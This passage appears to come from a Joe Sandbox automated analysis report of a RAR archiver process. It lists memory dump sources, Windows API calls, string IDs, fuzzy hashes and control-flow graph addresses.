                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                              • String ID: rarlng.dll
                                                                                                                                                                                                                              • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                              • Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                                                                              • Instruction ID: 4e345fc876273145de9d10c81a5a851e09cf1ac7dc991fae242d90a28f010cc5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9316331A18AD2C9FB64AF21E8452E9A3A0FB557A4FC04035E94D43698DF3CD5A9D730

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF7CF8A4620,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8A4736
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF7CF8A4620,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8A476B
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,00007FF7CF8A4620,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8A477A
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF7CF8A4620,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8A47A4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,00007FF7CF8A4620,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8A47B2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 869497890-0
                                                                                                                                                                                                                              • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                              • Instruction ID: 8420ebb37775374b8978070403e56857997c762f9a3aa4ff6a447f1ffd5083f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F41A332B09AC596EA64AF25E4402E8A3E0FB497B4F804331EB7D437D5DF6CE1659720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                                                                                              • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                              • Instruction ID: 00a0517f63cc1aef2817fb1f4a1eccee25b6e4b80e637b862108faeaf6037e9d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C016D26B0869086EB00AF16A844779A7A1EBD4FE0F598031DE4D43B68CF7DD9569720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Char
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 751630497-0
                                                                                                                                                                                                                              • Opcode ID: 30cca9b820c2462ea9223497f218cfc72479732bc9d6405a30229187a307cc14
                                                                                                                                                                                                                              • Instruction ID: e11b9b5154222da2c3d0c3fe74d4343d71b26b74c27792c67cbffd638b2b2ba5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30cca9b820c2462ea9223497f218cfc72479732bc9d6405a30229187a307cc14
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB229232A086C296E714EE30D8401EEB7E0FB90B68F885036DA4D57299DF78E956D770
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e2f7557d9bbb43876577635ce2a8ee37c70b1e2a3bca5ab09e7c7eb8e709d419
                                                                                                                                                                                                                              • Instruction ID: 6b3a7d7707d1bd15b755a65af349bbd29b46c923db10b3daf9c1b4d72168356b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2f7557d9bbb43876577635ce2a8ee37c70b1e2a3bca5ab09e7c7eb8e709d419
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA71F532A056C686D708EF29E4052ED73D1FB88FA4F144136DB5D8B399DF78A06197B0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 635 7ff7cf8c3ea8-7ff7cf8c3f03 call 7ff7cf8da5a0 call 7ff7cf8dc8a0 640 7ff7cf8c3f40-7ff7cf8c3f50 call 7ff7cf8ca9e8 635->640 641 7ff7cf8c3f05-7ff7cf8c3f3e GetModuleFileNameW call 7ff7cf8b4e14 call 7ff7cf8ca9c0 635->641 645 7ff7cf8c3f55-7ff7cf8c3f79 call 7ff7cf8a1874 call 7ff7cf8a1e80 640->645 641->645 652 7ff7cf8c4692-7ff7cf8c46c5 call 7ff7cf8a18ac call 7ff7cf8da610 645->652 653 7ff7cf8c3f7f-7ff7cf8c3f89 645->653 655 7ff7cf8c3fae-7ff7cf8c3feb call 7ff7cf8dec70 * 2 653->655 656 7ff7cf8c3f8b-7ff7cf8c3fac call 7ff7cf8c11c0 * 2 653->656 668 7ff7cf8c3fef-7ff7cf8c3ff3 655->668 656->655 669 7ff7cf8c40f2-7ff7cf8c4112 call 7ff7cf8a22e0 call 7ff7cf8deb90 668->669 670 7ff7cf8c3ff9-7ff7cf8c402d call 7ff7cf8a2440 call 7ff7cf8a2150 668->670 669->652 679 7ff7cf8c4118-7ff7cf8c4131 call 7ff7cf8a2150 669->679 680 7ff7cf8c4033 670->680 681 7ff7cf8c40bc-7ff7cf8c40e2 call 7ff7cf8a22e0 670->681 692 7ff7cf8c4133-7ff7cf8c4136 679->692 693 7ff7cf8c4138-7ff7cf8c414b call 7ff7cf8deb90 679->693 684 7ff7cf8c403a-7ff7cf8c403e 680->684 681->668 689 7ff7cf8c40e8-7ff7cf8c40ec 681->689 687 7ff7cf8c4040-7ff7cf8c4044 684->687 688 7ff7cf8c4064-7ff7cf8c4069 684->688 687->688 694 7ff7cf8c4046-7ff7cf8c405e call 7ff7cf8e2290 687->694 690 7ff7cf8c4097-7ff7cf8c409f 688->690 691 7ff7cf8c406b-7ff7cf8c4070 688->691 689->652 689->669 697 7ff7cf8c40a1 690->697 698 7ff7cf8c40b7 690->698 691->690 696 7ff7cf8c4072-7ff7cf8c4078 691->696 699 7ff7cf8c416f-7ff7cf8c41b1 call 7ff7cf8ca900 call 7ff7cf8deb90 692->699 693->652 710 7ff7cf8c4151-7ff7cf8c416c call 7ff7cf8cd54c call 7ff7cf8deb88 693->710 706 7ff7cf8c4060 694->706 707 7ff7cf8c40a3-7ff7cf8c40a7 694->707 703 7ff7cf8c4093 696->703 704 7ff7cf8c407a-7ff7cf8c4091 call 7ff7cf8e1700 696->704 697->684 698->681 718 7ff7cf8c41c0-7ff7cf8c41d5 699->718 719 7ff7cf8c41b3-7ff7cf8c41bb call 7ff7cf8deb88 699->719 703->690 704->703 716 7ff7cf8c40a9-7ff7cf8c40b5 704->716 706->688 707->698 710->699 716->681 722 7ff7cf8c45f0-7ff7cf8c4624 call 7ff7cf8c3884 call 7ff7cf8deb88 * 2 718->722 723 7ff7cf8c41db 718->723 719->652 762 7ff7cf8c4626-7ff7cf8c4648 call 7ff7cf8c11c0 * 2 722->762 763 7ff7cf8c464a-7ff7cf8c4691 call 7ff7cf8dec70 * 2 722->763 726 7ff7cf8c41e1-7ff7cf8c41ee 723->726 728 7ff7cf8c41f4-7ff7cf8c41fa 726->728 729 7ff7cf8c4508-7ff7cf8c4513 726->729 730 7ff7cf8c4208-7ff7cf8c420e 728->730 731 7ff7cf8c41fc-7ff7cf8c4202 728->731 729->722 733 7ff7cf8c4519-7ff7cf8c4523 729->733 734 7ff7cf8c43d0-7ff7cf8c43e0 call 7ff7cf8ca580 730->734 735 7ff7cf8c4214-7ff7cf8c425c 730->735 731->729 731->730 737 7ff7cf8c4585-7ff7cf8c4589 733->737 738 7ff7cf8c4525-7ff7cf8c452b 733->738 758 7ff7cf8c44f0-7ff7cf8c4503 734->758 759 7ff7cf8c43e6-7ff7cf8c4414 call 7ff7cf8ca9e8 call 7ff7cf8e172c 734->759 739 7ff7cf8c4261-7ff7cf8c4264 735->739 741 7ff7cf8c45a3-7ff7cf8c45d4 call 7ff7cf8c3884 737->741 742 7ff7cf8c458b-7ff7cf8c458f 737->742 744 7ff7cf8c4531-7ff7cf8c4539 738->744 745 7ff7cf8c45db-7ff7cf8c45de 738->745 749 7ff7cf8c4268-7ff7cf8c4270 739->749 741->745 742->741 751 7ff7cf8c4591-7ff7cf8c4597 742->751 746 7ff7cf8c4573-7ff7cf8c457a 744->746 747 7ff7cf8c453b-7ff7cf8c453e 744->747 745->722 748 7ff7cf8c45e0-7ff7cf8c45e5 745->748 760 7ff7cf8c457e-7ff7cf8c4583 746->760 755 7ff7cf8c4540-7ff7cf8c4543 747->755 756 7ff7cf8c456a-7ff7cf8c4571 747->756 748->726 749->749 757 7ff7cf8c4272-7ff7cf8c4288 call 7ff7cf8e1700 749->757 751->745 761 7ff7cf8c4599-7ff7cf8c45a1 751->761 764 7ff7cf8c4561-7ff7cf8c4568 755->764 765 7ff7cf8c4545-7ff7cf8c4548 755->765 756->760 779 7ff7cf8c42a3 757->779 780 7ff7cf8c428a-7ff7cf8c4295 757->780 758->729 759->758 787 7ff7cf8c441a-7ff7cf8c44a9 call 7ff7cf8cd840 call 7ff7cf8ca900 call 7ff7cf8ca8c4 call 7ff7cf8ca900 call 7ff7cf8e15fc 759->787 760->745 761->745 762->763 763->652 764->760 771 7ff7cf8c454a-7ff7cf8c454d 765->771 772 7ff7cf8c4558-7ff7cf8c455f 765->772 771->751 777 7ff7cf8c454f-7ff7cf8c4556 771->777 772->760 777->760 786 7ff7cf8c42a7-7ff7cf8c42be 779->786 780->779 784 7ff7cf8c4297-7ff7cf8c42a1 780->784 784->786 786->739 788 7ff7cf8c42c0-7ff7cf8c42c2 786->788 822 7ff7cf8c44bf-7ff7cf8c44cf 787->822 823 7ff7cf8c44ab-7ff7cf8c44bb 787->823 790 7ff7cf8c42e6 788->790 791 7ff7cf8c42c4-7ff7cf8c42d6 call 7ff7cf8ca900 788->791 790->734 792 7ff7cf8c42ec 790->792 797 7ff7cf8c42db-7ff7cf8c42e1 791->797 795 7ff7cf8c42f1-7ff7cf8c42f7 792->795 799 7ff7cf8c4300-7ff7cf8c4303 795->799 800 7ff7cf8c42f9-7ff7cf8c42fe 795->800 798 7ff7cf8c45d6 797->798 798->745 799->795 800->799 803 7ff7cf8c4305-7ff7cf8c4314 800->803 805 7ff7cf8c4316-7ff7cf8c4320 803->805 806 7ff7cf8c433d-7ff7cf8c4347 803->806 808 7ff7cf8c4323-7ff7cf8c4327 805->808 809 7ff7cf8c45ea-7ff7cf8c45ef call 7ff7cf8da774 806->809 810 7ff7cf8c434d-7ff7cf8c4378 call 7ff7cf8cd840 806->810 808->806 813 7ff7cf8c4329-7ff7cf8c433b 808->813 809->722 819 7ff7cf8c437a-7ff7cf8c4399 call 7ff7cf8e1764 810->819 820 7ff7cf8c439e-7ff7cf8c43cb call 7ff7cf8c470c 810->820 813->806 813->808 819->797 820->797 826 7ff7cf8c44d2-7ff7cf8c44d8 822->826 823->822 828 7ff7cf8c44da-7ff7cf8c44e5 826->828 829 7ff7cf8c44eb-7ff7cf8c44ee 826->829 828->798 828->829 829->826
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                                                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                                                                              • API String ID: 602362809-1645646101
                                                                                                                                                                                                                              • Opcode ID: 14e62526a5fe094f5313bc459bcb89c49d64b592d177cda5e67d6b33ee2d4267
                                                                                                                                                                                                                              • Instruction ID: 92346c919710dad404edfc54d008ddf50fb0741099c0b55d50e1590e15c169b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14e62526a5fe094f5313bc459bcb89c49d64b592d177cda5e67d6b33ee2d4267
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F22B222A197C285EB20AF15D8506F9A3E1FF447A4FC04136EA4D876D9EF2CE5A5D330

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1405 7ff7cf894fd0-7ff7cf89502d call 7ff7cf8da5a0 1408 7ff7cf89502f-7ff7cf895037 1405->1408 1409 7ff7cf89504d-7ff7cf895055 1405->1409 1408->1409 1410 7ff7cf895039-7ff7cf89504b call 7ff7cf8dc8a0 1408->1410 1411 7ff7cf895057-7ff7cf895069 call 7ff7cf89481c 1409->1411 1412 7ff7cf89506e-7ff7cf895089 call 7ff7cf8b420c 1409->1412 1410->1409 1410->1411 1411->1412 1418 7ff7cf89509f-7ff7cf8950b6 call 7ff7cf8cdb08 1412->1418 1419 7ff7cf89508b-7ff7cf89509d call 7ff7cf8ca9c0 1412->1419 1424 7ff7cf89511b-7ff7cf895131 call 7ff7cf8dc8a0 1418->1424 1425 7ff7cf8950b8-7ff7cf8950c3 call 7ff7cf8ca59c 1418->1425 1419->1424 1430 7ff7cf895203-7ff7cf89520d call 7ff7cf8caa48 1424->1430 1431 7ff7cf895137-7ff7cf89513e 1424->1431 1425->1424 1432 7ff7cf8950c5-7ff7cf8950cf call 7ff7cf8a3054 1425->1432 1437 7ff7cf895212-7ff7cf89521c 1430->1437 1433 7ff7cf895140-7ff7cf895167 call 7ff7cf8b3f98 1431->1433 1434 7ff7cf89516c-7ff7cf8951be call 7ff7cf8caa1c call 7ff7cf8caa48 call 7ff7cf8c6e98 1431->1434 1432->1424 1443 7ff7cf8950d1-7ff7cf895107 call 7ff7cf8ca9e8 call 7ff7cf8ca9c0 call 7ff7cf8a3054 1432->1443 1433->1434 1487 7ff7cf8951d3-7ff7cf8951e8 call 7ff7cf8c7a24 1434->1487 1441 7ff7cf895222 1437->1441 1442 7ff7cf8952db-7ff7cf8952e0 1437->1442 1446 7ff7cf89532f-7ff7cf895332 1441->1446 1447 7ff7cf895228-7ff7cf89522d 1441->1447 1448 7ff7cf895453-7ff7cf895477 call 7ff7cf89f00c call 7ff7cf89f230 call 7ff7cf89f09c 1442->1448 1449 7ff7cf8952e6-7ff7cf8952e9 1442->1449 1443->1424 1524 7ff7cf895109-7ff7cf895116 call 7ff7cf8ca9e8 1443->1524 1455 7ff7cf895334 1446->1455 1456 7ff7cf89533b-7ff7cf89533e 1446->1456 1447->1446 1453 7ff7cf895233-7ff7cf895236 1447->1453 1504 7ff7cf89547c-7ff7cf895483 1448->1504 1457 7ff7cf8952ef-7ff7cf8952f2 1449->1457 1458 7ff7cf895379-7ff7cf895382 1449->1458 1463 7ff7cf895290-7ff7cf895299 1453->1463 1464 7ff7cf895238-7ff7cf89523b 1453->1464 1455->1456 1468 7ff7cf895340 1456->1468 1469 7ff7cf895347-7ff7cf895358 call 7ff7cf881230 call 7ff7cf884858 1456->1469 1459 7ff7cf8952f4-7ff7cf8952f7 1457->1459 1460 7ff7cf89536c-7ff7cf895374 call 7ff7cf8c81cc 1457->1460 1466 7ff7cf895388-7ff7cf89538b 1458->1466 1467 7ff7cf895449-7ff7cf895451 call 7ff7cf8beab8 1458->1467 1459->1448 1471 7ff7cf8952fd-7ff7cf895300 1459->1471 1460->1504 1473 7ff7cf8952b2-7ff7cf8952bd 1463->1473 1474 7ff7cf89529b-7ff7cf89529e 1463->1474 1476 7ff7cf895274-7ff7cf89528b call 7ff7cf881230 call 7ff7cf8848ec 1464->1476 1477 7ff7cf89523d-7ff7cf895240 1464->1477 1481 7ff7cf895391-7ff7cf895397 1466->1481 1482 7ff7cf89541b-7ff7cf895433 call 7ff7cf8cab1c 1466->1482 1467->1504 1468->1469 1515 7ff7cf89535d 1469->1515 1471->1446 1494 7ff7cf895302-7ff7cf895305 1471->1494 1486 7ff7cf8952ce-7ff7cf8952d6 call 7ff7cf8b55e0 1473->1486 1488 7ff7cf8952bf-7ff7cf8952c9 call 7ff7cf8ca9e8 1473->1488 1485 7ff7cf8952a0-7ff7cf8952a6 1474->1485 1474->1486 1532 7ff7cf89535e-7ff7cf895362 call 7ff7cf8814fc 1476->1532 1477->1448 1496 7ff7cf895246-7ff7cf895249 1477->1496 1492 7ff7cf895399-7ff7cf89539c 1481->1492 1493 7ff7cf89540c-7ff7cf895419 call 7ff7cf8b54f8 call 7ff7cf8b51e4 1481->1493 1482->1504 1516 7ff7cf895435-7ff7cf895447 call 7ff7cf8bbbd4 1482->1516 1500 7ff7cf895313-7ff7cf89531d call 7ff7cf89481c 1485->1500 1501 7ff7cf8952a8-7ff7cf8952ad call 7ff7cf897214 1485->1501 1486->1504 1535 7ff7cf8951c0-7ff7cf8951ce call 7ff7cf8caa48 1487->1535 1536 7ff7cf8951ea-7ff7cf895201 call 7ff7cf8c6f68 call 7ff7cf8814c0 1487->1536 1488->1486 1507 7ff7cf8953ef-7ff7cf895401 call 7ff7cf8945c8 1492->1507 1508 7ff7cf89539e-7ff7cf8953a1 1492->1508 1493->1504 1509 7ff7cf895322-7ff7cf89532a call 7ff7cf8a67e0 1494->1509 1510 7ff7cf895307-7ff7cf89530a 1494->1510 1496->1446 1512 7ff7cf89524f-7ff7cf895252 1496->1512 1500->1504 1501->1504 1521 7ff7cf895491-7ff7cf8954bc call 7ff7cf8da610 1504->1521 1522 7ff7cf895485-7ff7cf89548c call 7ff7cf898444 1504->1522 1507->1493 1508->1500 1520 7ff7cf8953a7-7ff7cf8953d5 call 7ff7cf8945c8 call 7ff7cf8cab1c 1508->1520 1509->1504 1510->1448 1523 7ff7cf895310 1510->1523 1512->1448 1527 7ff7cf895258-7ff7cf89525b 1512->1527 1515->1532 1516->1504 1520->1504 1561 7ff7cf8953db-7ff7cf8953ea call 7ff7cf8bba9c 1520->1561 1522->1521 1523->1500 1524->1424 1543 7ff7cf89526b-7ff7cf895272 1527->1543 1544 7ff7cf89525d-7ff7cf895260 1527->1544 1555 7ff7cf895367 1532->1555 1535->1487 1536->1437 1543->1486 1544->1509 1553 7ff7cf895266 1544->1553 1553->1523 1555->1504 1561->1504
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
